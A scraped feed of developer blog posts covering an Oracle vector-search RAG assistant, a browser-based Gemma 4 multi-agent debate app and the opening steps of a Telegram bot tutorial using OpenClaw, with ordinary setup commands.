&lt;p&gt;The banned-keyword scan and dangerous-package regex handle the rest. Multi-layer defence means the first-keyword check doesn't need to be perfect at token-type discrimination — it just needs to recognise legitimate SQL starters.&lt;/p&gt;

&lt;p&gt;What I like about this one: the test caught the bug in seconds. I didn't have to discover it in production with a real CTE-using user. That's the value of a guardrail test suite.&lt;/p&gt;

&lt;h3&gt;
  
  
  5. Prompt caching doesn't help on first turns. Only follow-ups.
&lt;/h3&gt;

&lt;p&gt;I'd read about Anthropic's prompt caching dropping costs ~85 % and assumed I'd see that immediately. First eval run, all ten questions: &lt;code&gt;cache_read_input_tokens: 0&lt;/code&gt; across the board. Cost was $0.10 for the run.&lt;/p&gt;

&lt;p&gt;What I missed: each question retrieves a &lt;em&gt;different&lt;/em&gt; set of context chunks. The cached prefix (system prompt + retrieved context) is different per question, so every first turn writes to the cache, none read from it.&lt;/p&gt;

&lt;p&gt;Where caching actually fires is &lt;strong&gt;multi-turn follow-ups on the same retrieval&lt;/strong&gt;. Ask "concurrent request stuck — what do I check?" then "what about OPP memory pressure?" → the second turn reuses the same retrieved context → cache hit, ~85 % cost drop on the cached portion.&lt;/p&gt;

&lt;p&gt;I added a sidebar widget to the Streamlit UI that tracks the live cache hit rate. Now I can &lt;em&gt;see&lt;/em&gt; the cache working when I ask follow-ups in the same chat. Without that visibility I'd have assumed it wasn't working.&lt;/p&gt;

&lt;p&gt;The Anthropic docs are clear about this; I just didn't read carefully enough. The lesson: instrument cost and cache metrics from day one, not as a later optimisation.&lt;/p&gt;




&lt;h2&gt;
  
  
  What the numbers look like in practice
&lt;/h2&gt;

&lt;p&gt;Per question over the 10-question golden eval:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Input tokens: ~900–1,500&lt;/li&gt;
&lt;li&gt;Output tokens: ~400–600&lt;/li&gt;
&lt;li&gt;Cost on Claude Sonnet: ~$0.01 per question&lt;/li&gt;
&lt;li&gt;On follow-ups with cache hit: ~$0.002 per question&lt;/li&gt;
&lt;li&gt;Retrieval latency (brute-force VECTOR_DISTANCE on 17 chunks): under 50 ms&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;The HNSW vector index is intentionally deferred. Oracle 23ai's HNSW needs &lt;code&gt;vector_memory_size &amp;gt; 0&lt;/code&gt; which requires a database restart. For 17 chunks, brute force is so fast that adding HNSW would be premature optimisation. It's a future blog post — "before/after benchmark when the corpus grows to 10,000 chunks."&lt;/p&gt;




&lt;h2&gt;
  
  
  What I'd do differently if I started over
&lt;/h2&gt;

&lt;p&gt;A few honest self-critiques after sitting with the result for a day:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;More synthetic notes from the start.&lt;/strong&gt; Three is enough to prove the pipeline, but for eval-driven iteration you really want 15–20. I'll grow the dataset over the next few weekends.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Hybrid retrieval would have been worth the day.&lt;/strong&gt; Pure vector search has a known weakness: it doesn't always rank obvious keyword matches first. Adding Oracle Text BM25 in parallel and ranking on a combined score is a 20 % retrieval recall improvement on most datasets. Will be the next thing I build.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;The MCP server should have AWR/ASH tools from day one.&lt;/strong&gt; The whole point of an Oracle MCP server is to let an LLM read production diagnostics. Top SQL is in there now; AWR snapshot summary, ASH wait-event histogram, and DB time-model breakdown all belong in the next release.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;CI should run the eval on every PR, not just locally.&lt;/strong&gt; It does now — added &lt;code&gt;.github/workflows/eval.yml&lt;/code&gt; — but the secrets aren't configured yet so it'll fail on first PR until I add them. Tomorrow problem.&lt;/li&gt;
&lt;/ul&gt;




&lt;h2&gt;
  
  
  The DBA-to-AI take-away
&lt;/h2&gt;

&lt;p&gt;If you're an Oracle DBA reading this, three points to leave you with:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;The vector database you might be evaluating in 2026 is already in Oracle.&lt;/strong&gt; Native &lt;code&gt;VECTOR&lt;/code&gt; datatype since 23ai (released 2024). If your shop runs Oracle, your data is already where the embeddings should live. Single SQL surface, single security model, single backup story.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Production-AI is mostly the production part.&lt;/strong&gt; Connection pooling, statement timeouts, audit logs, schema allowlists, PII redaction, prompt caching — these are day-one DBA instincts. Most AI tutorials are written by people who haven't carried a pager and it shows.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Pick a real workload and embed an LLM next to it.&lt;/strong&gt; Don't try to compete with ML researchers. The leverage for DBAs is using AI to make existing data more accessible. A RAG assistant over your team's existing runbooks is a higher-ROI weekend project than learning PyTorch.&lt;/p&gt;&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;The job market in 2026 isn't "DBA versus AI engineer." It's "DBA who can ship AI infrastructure versus everyone else." The data depth is the moat. The AI piece sits on top.&lt;/p&gt;




&lt;h2&gt;
  
  
  Repos and links
&lt;/h2&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Talk to EBS&lt;/strong&gt; (RAG demo): &lt;a href="https://github.com/shopsmartai/oracle-ebs-rag" rel="noopener noreferrer"&gt;github.com/shopsmartai/oracle-ebs-rag&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;mcp-oracle-dba&lt;/strong&gt; (MCP server): &lt;a href="https://github.com/shopsmartai/mcp-oracle-dba" rel="noopener noreferrer"&gt;github.com/shopsmartai/mcp-oracle-dba&lt;/a&gt;
&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Both MIT-licensed. Dataset is fully synthetic. If you're an Oracle person working on similar things, my DMs are open — happy to compare notes. If you're a recruiter working on senior roles in AI / data infrastructure or Oracle + cloud automation, also happy to chat.&lt;/p&gt;

&lt;p&gt;Feedback on the post welcome in the comments.&lt;/p&gt;

</description>
      <category>ai</category>
      <category>oracle</category>
      <category>rag</category>
      <category>mcp</category>
    </item>
    <item>
      <title>I Built an AI That Argues With Itself About Anything</title>
      <dc:creator>Ranjith Kumar Kondoju</dc:creator>
      <pubDate>Sat, 09 May 2026 05:48:31 +0000</pubDate>
      <link>https://dev.to/rkondoju/i-built-an-ai-that-argues-with-itself-about-anything-5aa5</link>
      <guid>https://dev.to/rkondoju/i-built-an-ai-that-argues-with-itself-about-anything-5aa5</guid>
      <description>&lt;p&gt;&lt;em&gt;This is a submission for the &lt;a href="https://dev.to/challenges/google-gemma-2026-05-06"&gt;Gemma 4 Challenge: Build with Gemma 4&lt;/a&gt;&lt;/em&gt;&lt;/p&gt;

&lt;h2&gt;
  
  
  What I Built
&lt;/h2&gt;

&lt;p&gt;&lt;strong&gt;AgentMesh&lt;/strong&gt; is a thinking partner that argues with itself. Ask it any opinionated question and three Gemma 4 agents take different stances on it: a skeptic finds the strongest counter-arguments, an advocate makes the strongest case in favor, and a pragmatist describes how it actually plays out in practice. Each agent searches Wikipedia and Hacker News comments in parallel for evidence, then a synthesizer shows you where the three agreed, where they disagreed, and reconciles them.&lt;/p&gt;

&lt;p&gt;It solves a real problem: single-shot LLMs collapse to one voice. Ask ChatGPT or Gemini "Is the AI bubble about to burst?" and you get a balanced-sounding answer that hides the actual disagreement. The model is averaging perspectives behind the scenes. AgentMesh forces the disagreement to surface, with three agents each holding a fixed stance and a synthesizer that calls out where they parted ways. You see the &lt;em&gt;argument&lt;/em&gt;, not just the conclusion.&lt;/p&gt;

&lt;p&gt;The whole thing runs in the browser with &lt;strong&gt;zero servers contacted by us&lt;/strong&gt;. Two ways to run it:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Local:&lt;/strong&gt; Gemma 4 E2B on your GPU via WebGPU + Transformers.js. ~3 GB first download, then cached. Total privacy: nothing leaves the tab.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Cloud (BYOK):&lt;/strong&gt; Bring your own free Google AI Studio key. Calls go from your browser directly to Gemini API, never through any backend of mine. ~30 seconds per query.&lt;/li&gt;
&lt;/ul&gt;

&lt;h2&gt;
  
  
  Demo
&lt;/h2&gt;

&lt;p&gt;&lt;strong&gt;Live:&lt;/strong&gt; &lt;a href="https://shopsmartai.github.io/agentmesh/" rel="noopener noreferrer"&gt;https://shopsmartai.github.io/agentmesh/&lt;/a&gt;&lt;br&gt;
&lt;strong&gt;Demo Video:&lt;/strong&gt; &lt;a href="https://shopsmartai.github.io/agentmesh/assets/agentmesh-demo.gif" rel="noopener noreferrer"&gt;https://shopsmartai.github.io/agentmesh/assets/agentmesh-demo.gif&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fshopsmartai.github.io%2Fagentmesh%2Fassets%2Fagentmesh-demo.gif" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fshopsmartai.github.io%2Fagentmesh%2Fassets%2Fagentmesh-demo.gif" alt="AgentMesh demo: three Gemma 4 agents arguing through a question, a synthesizer reconciling them" width="8" height="4"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Open in any modern browser (Chrome 113+ for local mode; any modern browser for cloud mode). The Settings panel has a radio toggle to pick local or cloud. Try one of the suggestion buttons (&lt;em&gt;Tesla in 2026&lt;/em&gt;, &lt;em&gt;AI bubble?&lt;/em&gt;, &lt;em&gt;Buy a house?&lt;/em&gt;) or type your own opinionated question.&lt;/p&gt;

&lt;h2&gt;
  
  
  Code
&lt;/h2&gt;

&lt;p&gt;&lt;strong&gt;Repo:&lt;/strong&gt; &lt;a href="https://github.com/shopsmartai/agentmesh" rel="noopener noreferrer"&gt;https://github.com/shopsmartai/agentmesh&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;MIT licensed, vanilla JavaScript with no build step. The interesting files:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;code&gt;js/agents.js&lt;/code&gt; — planner / perspective workers (skeptic, advocate, pragmatist) / synthesizer + multi-source gather&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;js/model.js&lt;/code&gt; — routes &lt;code&gt;model.chat()&lt;/code&gt; to the local Web Worker or the Gemini API; cloud adapter with retry-with-backoff, timeout, fallback chain, thinking-mode stripping&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;js/model.worker.js&lt;/code&gt; — the local model life cycle: load, warmup, streaming chat, throttled progress&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;js/tools.js&lt;/code&gt; — Wikipedia, Hacker News stories + comments, DuckDuckGo, arXiv (CORS-friendly, no keys)&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;coi-serviceworker.js&lt;/code&gt; — COOP/COEP header injector so SharedArrayBuffer works on GitHub Pages&lt;/li&gt;
&lt;/ul&gt;

&lt;h2&gt;
  
  
  How I Used Gemma 4
&lt;/h2&gt;

&lt;p&gt;I used &lt;strong&gt;two Gemma 4 sizes&lt;/strong&gt; to power the same architecture at two scales:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Gemma 4 E2B&lt;/strong&gt; for local, in-browser inference. ~3.1 GB at q4f16, runs in a Web Worker via Transformers.js + ONNX Runtime + WebGPU.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Gemma 4 E4B (&lt;code&gt;gemma-4-26b-a4b-it&lt;/code&gt;)&lt;/strong&gt; for cloud inference. 26B total params with 4B active (Mixture-of-Experts), hosted on Google AI Studio. Falls back to &lt;strong&gt;31B Dense (&lt;code&gt;gemma-4-31b-it&lt;/code&gt;)&lt;/strong&gt; if E4B has a transient issue.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Same model family, two scales, so the local and cloud paths produce comparable shape of answers. Pick your trade-off: privacy + slow (local) or speed + bigger model (cloud).&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Why Gemma 4 specifically.&lt;/strong&gt; Multi-perspective agents only work if the model has three properties at once, and Gemma 4 ships all three:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Strong instruction following.&lt;/strong&gt; The skeptic must actually argue against the topic. The advocate must actually argue for it. Smaller models drift, hedge, or write balanced summaries that ignore their assigned stance. I tested SmolLM2-360M as a control and it cannot stay in role: tell it "you are the skeptic" and it writes a balanced paragraph anyway. Gemma 4 stays sharp across all three perspectives. The roles do not blur.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Refuses to invent facts when notes are thin.&lt;/strong&gt; Workers anchor in research notes when they support the stance, and use general training knowledge to fill gaps when notes are weak. They are honest about which claims have evidence vs which are widely-held belief. The hallucination resistance is what makes the disagreement &lt;em&gt;trustworthy&lt;/em&gt; rather than theatrical.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Browser to server, one architecture.&lt;/strong&gt; E2B at q4f16 is small enough to fit in a Chrome tab alongside the ONNX runtime and a streaming UI. E4B and 31B Dense are server-class and Google hosts them on AI Studio for free with a personal API key. So the local and cloud paths use the same model family with no architectural rework.&lt;/p&gt;&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;E2B and the larger variants both expose a 128K context window. I am not using all of it yet, but the headroom means future versions can feed full documents to the perspective agents instead of search snippets.&lt;/p&gt;




&lt;p&gt;The rest of this post is the engineering writeup. There is more of it than I expected when I started.&lt;/p&gt;

&lt;h2&gt;
  
  
  Why three agents instead of one
&lt;/h2&gt;

&lt;p&gt;Try this in your head. Ask any chat model "Is buying a Tesla a good investment in 2026?" You will get a balanced essay. The model will give you one paragraph for each side and a polite ending. It is fine. It is also boring. It is hiding what the model actually thinks each side's strongest argument is.&lt;/p&gt;

&lt;p&gt;A multi-agent system can do something a single call cannot. You give each agent a fixed role and a separate context. The skeptic does not get to soften its view by also writing the advocate's paragraph. The advocate does not get to hedge. They have to commit. Only then do you reconcile.&lt;/p&gt;

&lt;p&gt;This is the only architecture I know of where the multi-agent shape gives a concrete win that single-call inference cannot match. It is not "five agents read the same Wikipedia article and produce variants." It is three agents holding three positions and a synthesizer showing the gap.&lt;/p&gt;

&lt;p&gt;The architecture also makes the answer better in a small way that matters. Each agent searches Wikipedia AND Hacker News comments in parallel for evidence supporting its stance. Wikipedia gives encyclopedic facts. HN comments give substantive user opinions and lived experience. Workers see both, anchor in the parts that support their stance, and ground their argument in real material rather than hallucinating.&lt;/p&gt;

&lt;h2&gt;
  
  
  The two modes (more detail)
&lt;/h2&gt;

&lt;p&gt;Local mode runs Gemma 4 E2B on your GPU. First page load downloads about 3.1 GB of weights into the browser cache. After that, reload is instant. Inference takes 3 to 5 minutes per query on a consumer GPU because WebGPU LLM inference is single-stream and we have five sequential model calls per swarm. Privacy is total: nothing leaves the tab once weights are cached.&lt;/p&gt;

&lt;p&gt;Cloud mode runs Gemma 4 E4B (&lt;code&gt;gemma-4-26b-a4b-it&lt;/code&gt;) on Google's servers via the Gemini API. You bring your own free key from &lt;a href="https://aistudio.google.com/app/apikey" rel="noopener noreferrer"&gt;aistudio.google.com/app/apikey&lt;/a&gt;. The key lives only in your browser's localStorage; it is never embedded in the public code, never transmitted to anyone except Google. Inference takes 20 to 40 seconds per query. The privacy story shifts: queries go through Google.&lt;/p&gt;

&lt;p&gt;You pick. The Settings panel has a radio toggle and a key input. The header tells you which mode is active.&lt;/p&gt;

&lt;h2&gt;
  
  
  The eight engineering problems
&lt;/h2&gt;

&lt;p&gt;Naming the problems is the actual point of this post because most of them are reusable knowledge for anyone trying to ship browser-LLM apps.&lt;/p&gt;

&lt;h3&gt;
  
  
  1. The page was not cross-origin isolated
&lt;/h3&gt;

&lt;p&gt;GitHub Pages does not let you set custom HTTP headers. Without two specific headers (&lt;code&gt;Cross-Origin-Opener-Policy: same-origin&lt;/code&gt; and &lt;code&gt;Cross-Origin-Embedder-Policy: credentialless&lt;/code&gt;), the browser will not enable &lt;code&gt;SharedArrayBuffer&lt;/code&gt;. The ONNX runtime needs &lt;code&gt;SharedArrayBuffer&lt;/code&gt; to run on WebGPU. Without it, every model load failed with raw numeric errors that pointed into the WebAssembly heap (literal numbers like &lt;code&gt;11514632&lt;/code&gt;).&lt;/p&gt;

&lt;p&gt;Fix: ship a service worker (adapted from coi-serviceworker, MIT) that intercepts every response and adds the missing headers. First load registers the worker and reloads. After that, the page is cross-origin isolated and &lt;code&gt;SharedArrayBuffer&lt;/code&gt; becomes available.&lt;/p&gt;

&lt;h3&gt;
  
  
  2. WebGPU compile froze the tab for a minute
&lt;/h3&gt;

&lt;p&gt;The first time the ONNX runtime loads a model on WebGPU, it has to compile shaders for every operation in the network. For Gemma 4 E2B that takes anywhere from thirty seconds to over a minute. Done on the main thread, the page becomes unresponsive.&lt;/p&gt;

&lt;p&gt;Fix: put the entire model life cycle in a Web Worker. The page sees a thin proxy that exposes &lt;code&gt;model.load(onProgress)&lt;/code&gt; and &lt;code&gt;model.chat(messages, opts)&lt;/code&gt;. The proxy talks to the worker over &lt;code&gt;postMessage&lt;/code&gt;. Heavy work happens off the main thread; the page stays interactive.&lt;/p&gt;

&lt;h3&gt;
  
  
  3. The worker flooded the main thread anyway
&lt;/h3&gt;

&lt;p&gt;After moving the model into the worker, the page froze again for a different reason. Transformers.js fires a progress callback for every chunk of the download. With a 1.5 GB file, that is hundreds of events per second. Each one became a &lt;code&gt;postMessage&lt;/code&gt; to the main thread. The main thread message queue saturated.&lt;/p&gt;

&lt;p&gt;Fix: throttle progress messages to one every 100 milliseconds. Always send state changes immediately (started, finished, ready) but coalesce the actual progress percentages.&lt;/p&gt;

&lt;h3&gt;
  
  
  4. Wikipedia search returned nothing for verbose questions
&lt;/h3&gt;

&lt;p&gt;Pressure-testing the live site exposed a fundamental issue. Even simple queries like "What is photosynthesis?" were producing answers like "research notes are empty." Two of three workers were giving up.&lt;/p&gt;

&lt;p&gt;The bug was upstream. The model-driven planner was generating verbose sub-questions like "What is the fundamental definition of photosynthesis and its core chemical processes?" Wikipedia's classic search API does title-prefix matching, and that string is not the prefix of any Wikipedia article title.&lt;/p&gt;

&lt;p&gt;Fix in three parts. Switch to Wikipedia's full-text search API. Strip filler words from the search query before sending it (a list of about 60 question-shape filler words). Add a relevance gate: if no result title contains a meaningful word from the query, treat it as zero results and cascade to a different source.&lt;/p&gt;

&lt;h3&gt;
  
  
  5. The planner was spending 30 seconds on something a regex could do
&lt;/h3&gt;

&lt;p&gt;The original planner used the model itself to extract the topic and generate three search queries. It took about 30 seconds on Gemma 4. Then I noticed the model was just echoing the user's full question into the template. It was not actually doing extraction. It was a slow templating engine.&lt;/p&gt;

&lt;p&gt;Fix: replace the planner's model call with a small JavaScript function. Strip leading question words and trailing punctuation. Strip "X better than Y" comparisons to keep just X. Cap at 3 words. Done in milliseconds. The planner card still appears in the swarm visualization; it just shows the topic immediately rather than streaming through 30 seconds of model generation.&lt;/p&gt;

&lt;h3&gt;
  
  
  6. Wikipedia gave facts but no opinions
&lt;/h3&gt;

&lt;p&gt;For opinion questions ("Is remote work better than in-office work?"), Wikipedia gave the encyclopedic article on remote work, which is descriptive, not opinionated. Workers correctly noticed they could not construct a real critique from descriptive material and refused.&lt;/p&gt;

&lt;p&gt;Fix: search multiple sources in parallel. For every worker query, fetch Wikipedia AND Hacker News comments at the same time. Wikipedia provides encyclopedic grounding. HN comments provide actual user opinions and lived experience, with paragraphs of real takes that no encyclopedia has. Workers see both and decide what to anchor on. The "0 servers contacted" line in the footer lost its third significant digit but the architecture finally produces grounded opinion content.&lt;/p&gt;

&lt;h3&gt;
  
  
  7. Cloud mode was the next thing the project needed
&lt;/h3&gt;

&lt;p&gt;Local Gemma 4 E2B at 3 to 5 minutes per query is real and unavoidable on consumer GPUs. The architecture only worked at "single user with patience" volume. Adding a cloud option mattered because it lets the same architecture run at 30 seconds per query on bigger Gemma 4 variants.&lt;/p&gt;

&lt;p&gt;The challenge was doing it without compromising the privacy story for users who care about it. Solution: BYOK. The Settings panel has a key input that writes only to localStorage. The public code contains no key (verified with &lt;code&gt;git grep&lt;/code&gt; for &lt;code&gt;AIza&lt;/code&gt; patterns before every push). The cloud path makes one fetch per agent call directly to &lt;code&gt;generativelanguage.googleapis.com&lt;/code&gt; from the user's browser. We never see the key, never proxy the requests, never log anything.&lt;/p&gt;

&lt;p&gt;The cloud adapter has a 60-second per-call timeout (we observed one worker hang indefinitely while the other two completed) and a two-stage resilience strategy. First, each model gets up to three attempts with 1s/2s exponential backoff if the API returns a 5xx, a 429, an empty body, or a timeout. Google's "Internal error encountered" on Gemma 4 is almost always transient and clears within one retry. Second, if a model still fails after retries, we fall through to the other Gemma 4 variant in the chain (E4B and 31B Dense). Hard errors like 404 (model not on your key) skip straight to the next variant; auth and bad-request errors bail immediately.&lt;/p&gt;

&lt;h3&gt;
  
  
  8. Gemma 4 dumps its thinking into the response
&lt;/h3&gt;

&lt;p&gt;Even with &lt;code&gt;thinkingConfig.thinkingBudget=0&lt;/code&gt; (which the API rejects for Gemma 4 with a 400, by the way), Gemma 4 on the Gemini API outputs its internal reasoning verbatim: drafts, refinement passes, "Word count check" notes, before the actual final answer. The user's first cloud query produced about 600 words of thinking-out-loud before the clean structured answer.&lt;/p&gt;

&lt;p&gt;Fix: client-side stripping. The synthesizer's output always starts with &lt;code&gt;## Where they agreed&lt;/code&gt;. Find the LAST occurrence of that heading, trim everything before it. Strip leading "Final Polish:" / "Refined version:" labels. The model's thinking goes in the bin; the user sees only the polished output.&lt;/p&gt;

&lt;h2&gt;
  
  
  What I want to be honest about
&lt;/h2&gt;

&lt;p&gt;A few things people might assume from the demo that are not actually true.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Local mode is sequential, not parallel.&lt;/strong&gt; WebGPU LLM inference is single-stream per session. The three perspective agents take turns on one GPU. The visualization makes it look concurrent. Logically it is, physically it is not. Cloud mode actually fires three parallel Gemini calls but the synthesizer still waits for all three.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Cloud mode is private to Google, not to me.&lt;/strong&gt; Your queries go to Google's servers. Your key goes from your browser directly to Google. I never see either. But this is different from the local mode promise of "nothing leaves your tab." Both are valid trade-offs; you pick.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Niche cross-domain queries return weak findings.&lt;/strong&gt; When the public sources do not have an opinion to mine, the agents lean on training knowledge alone. They are honest about which claims have evidence versus widely-held belief.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;The 3 GB local-mode download is real.&lt;/strong&gt; No way around it for first-time local visitors. We gate the download behind an explicit click and persist via the browser cache so reload is free. Cloud mode is the alternative for visitors who do not want to commit.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Factual lookup queries do not benefit from this architecture.&lt;/strong&gt; If you ask "What is photosynthesis?" the skeptic does not really argue against photosynthesis. Three perspective agents on a factual lookup just produce three slightly different summaries of the same article. AgentMesh shines on questions with actual disagreement.&lt;/p&gt;

&lt;h2&gt;
  
  
  What I would build next
&lt;/h2&gt;

&lt;p&gt;If I keep working on this past the challenge, four things in priority order.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Native Gemma 4 tool calling.&lt;/strong&gt; The model has a structured tool-call format built into its chat template. Right now I use a deterministic dispatch (Wikipedia + HN comments in parallel). Switching to the native format would make tool selection cleaner and add another concrete reason the project specifically uses Gemma 4.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Multimodal, properly.&lt;/strong&gt; Gemma 4 E2B is multimodal. The code paths for image input exist in &lt;code&gt;model.worker.js&lt;/code&gt; but I rolled them back because per-component dtype configuration on diverse Chrome drivers needed more debugging than the challenge time-box allowed. Drop an image into the prompt. The skeptic argues against what is in it. The advocate argues for. The pragmatist describes how it gets used.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;More than three perspectives.&lt;/strong&gt; A historical agent (how did this work in the past?). A futurist agent (where is this going?). A user-of-the-thing agent. The architecture trivially extends.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;More sources.&lt;/strong&gt; Reddit JSON, Brave Search (would need a second BYOK key), Stack Exchange. Each broadens the grounding for opinionated queries.&lt;/p&gt;

&lt;p&gt;I am not committing to any of these yet. What I do next depends on what happens with this post. If a hospital CTO emails me about clinical literature review with locally-bound data, I will go faster on something like a persistent OPFS notebook. If five engineers fork the repo, I will go faster on multimodal and tool-calling. If neither, this stays a portfolio piece I am happy with.&lt;/p&gt;

&lt;h2&gt;
  
  
  Thanks
&lt;/h2&gt;

&lt;p&gt;To Google DeepMind for releasing Gemma 4 with weights small enough to actually fit in a browser tab AND making the bigger variants available on AI Studio for free, so the same project can run at two scales. To Hugging Face for Transformers.js, especially the 4.2.0 release that finally worked end to end. To gzuidhof for the coi-serviceworker library, which solved the cross-origin isolation problem in about five minutes once I knew it existed. To nico-martin for publishing the gemma4-browser-extension code, which was my reference for which library version actually loads this model. To everyone who keeps the open browser-ML stack moving forward.&lt;/p&gt;

&lt;p&gt;The code is MIT. Fork it. Rip out the parts you want. If you build something better with it, I would love to see what.&lt;/p&gt;

</description>
      <category>gemmachallenge</category>
      <category>devchallenge</category>
      <category>gemma</category>
      <category>webgpu</category>
    </item>
    <item>
      <title>How to Turn Any SaaS Into a Telegram Bot in 30 Minutes Using OpenClaw</title>
      <dc:creator>Ranjith Kumar Kondoju</dc:creator>
      <pubDate>Sun, 19 Apr 2026 21:52:15 +0000</pubDate>
      <link>https://dev.to/shirisha_uppoju_b20d30705/how-to-turn-any-saas-into-a-telegram-bot-in-30-minutes-using-openclaw-581j</link>
      <guid>https://dev.to/shirisha_uppoju_b20d30705/how-to-turn-any-saas-into-a-telegram-bot-in-30-minutes-using-openclaw-581j</guid>
      <description>&lt;p&gt;&lt;em&gt;This is a submission for the &lt;a href="https://dev.to/challenges/openclaw-2026"&gt;DEV OpenClaw Challenge 2026&lt;/a&gt;: Wealth of Knowledge&lt;/em&gt;&lt;/p&gt;

&lt;h2&gt;
  
  
  The Problem Every SaaS Founder Has
&lt;/h2&gt;

&lt;p&gt;You built a beautiful web app. Users love it. But friction is real: they have to open the browser, navigate to your site, log in, and then use your product.&lt;/p&gt;

&lt;p&gt;What if they could just message you on Telegram?&lt;/p&gt;

&lt;p&gt;Last week I gave my meal planning SaaS &lt;a href="https://usemealai.com" rel="noopener noreferrer"&gt;MealAI&lt;/a&gt; a Telegram interface using &lt;a href="https://github.com/openclaw/openclaw" rel="noopener noreferrer"&gt;OpenClaw&lt;/a&gt;. It took 30 minutes. No webhook hosting. No bot framework to learn. No custom API glue code.&lt;/p&gt;

&lt;p&gt;Here is exactly how I did it, and how you can do the same for any SaaS.&lt;/p&gt;

&lt;h2&gt;
  
  
  What You Will Build
&lt;/h2&gt;

&lt;p&gt;A Telegram bot that:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Talks in your product's voice (not generic ChatGPT)&lt;/li&gt;
&lt;li&gt;Has your product's domain expertise baked in&lt;/li&gt;
&lt;li&gt;Responds with branded formatting (emojis, bold, structure)&lt;/li&gt;
&lt;li&gt;Can be extended to call your real APIs&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;Time:&lt;/strong&gt; 30 minutes&lt;br&gt;
&lt;strong&gt;Cost:&lt;/strong&gt; Free (Docker + OpenAI API credits)&lt;br&gt;
&lt;strong&gt;Prerequisites:&lt;/strong&gt; Basic Docker knowledge, an OpenAI or Anthropic API key&lt;/p&gt;
&lt;h2&gt;
  
  
  Why OpenClaw?
&lt;/h2&gt;

&lt;p&gt;Before OpenClaw, building a Telegram AI bot meant:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;A Node.js backend with grammY or telegraf&lt;/li&gt;
&lt;li&gt;A hosted webhook endpoint&lt;/li&gt;
&lt;li&gt;Custom prompt management&lt;/li&gt;
&lt;li&gt;Session and memory handling&lt;/li&gt;
&lt;li&gt;Rate limiting logic&lt;/li&gt;
&lt;li&gt;Deployment pipeline&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;OpenClaw is an MIT licensed AI agent runtime that handles all of this in one binary. It supports 25 plus messaging platforms (Telegram, WhatsApp, Discord, Slack, Signal, iMessage, and more). Your agent works on any of them without code changes.&lt;/p&gt;

&lt;p&gt;Think of it as the WordPress of AI agents for messaging.&lt;/p&gt;
&lt;h2&gt;
  
  
  Step 1: Install Docker (2 min)
&lt;/h2&gt;

&lt;p&gt;On macOS, I recommend &lt;a href="https://orbstack.dev/" rel="noopener noreferrer"&gt;OrbStack&lt;/a&gt;. It is lighter than Docker Desktop.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;brew &lt;span class="nb"&gt;install&lt;/span&gt; &lt;span class="nt"&gt;--cask&lt;/span&gt; orbstack
open &lt;span class="nt"&gt;-a&lt;/span&gt; OrbStack

On Linux or Windows, use Docker Desktop.
Verify it works:
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;
&lt;p&gt;&lt;br&gt;
bash&lt;br&gt;
docker --version&lt;/p&gt;
&lt;h2&gt;
  
  
  Step 2: Pull OpenClaw (2 min)
&lt;/h2&gt;

&lt;p&gt;Create a working directory:&lt;br&gt;
&lt;/p&gt;
&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="nb"&gt;mkdir &lt;/span&gt;mealai-concierge &lt;span class="o"&gt;&amp;amp;&amp;amp;&lt;/span&gt; &lt;span class="nb"&gt;cd &lt;/span&gt;mealai-concierge
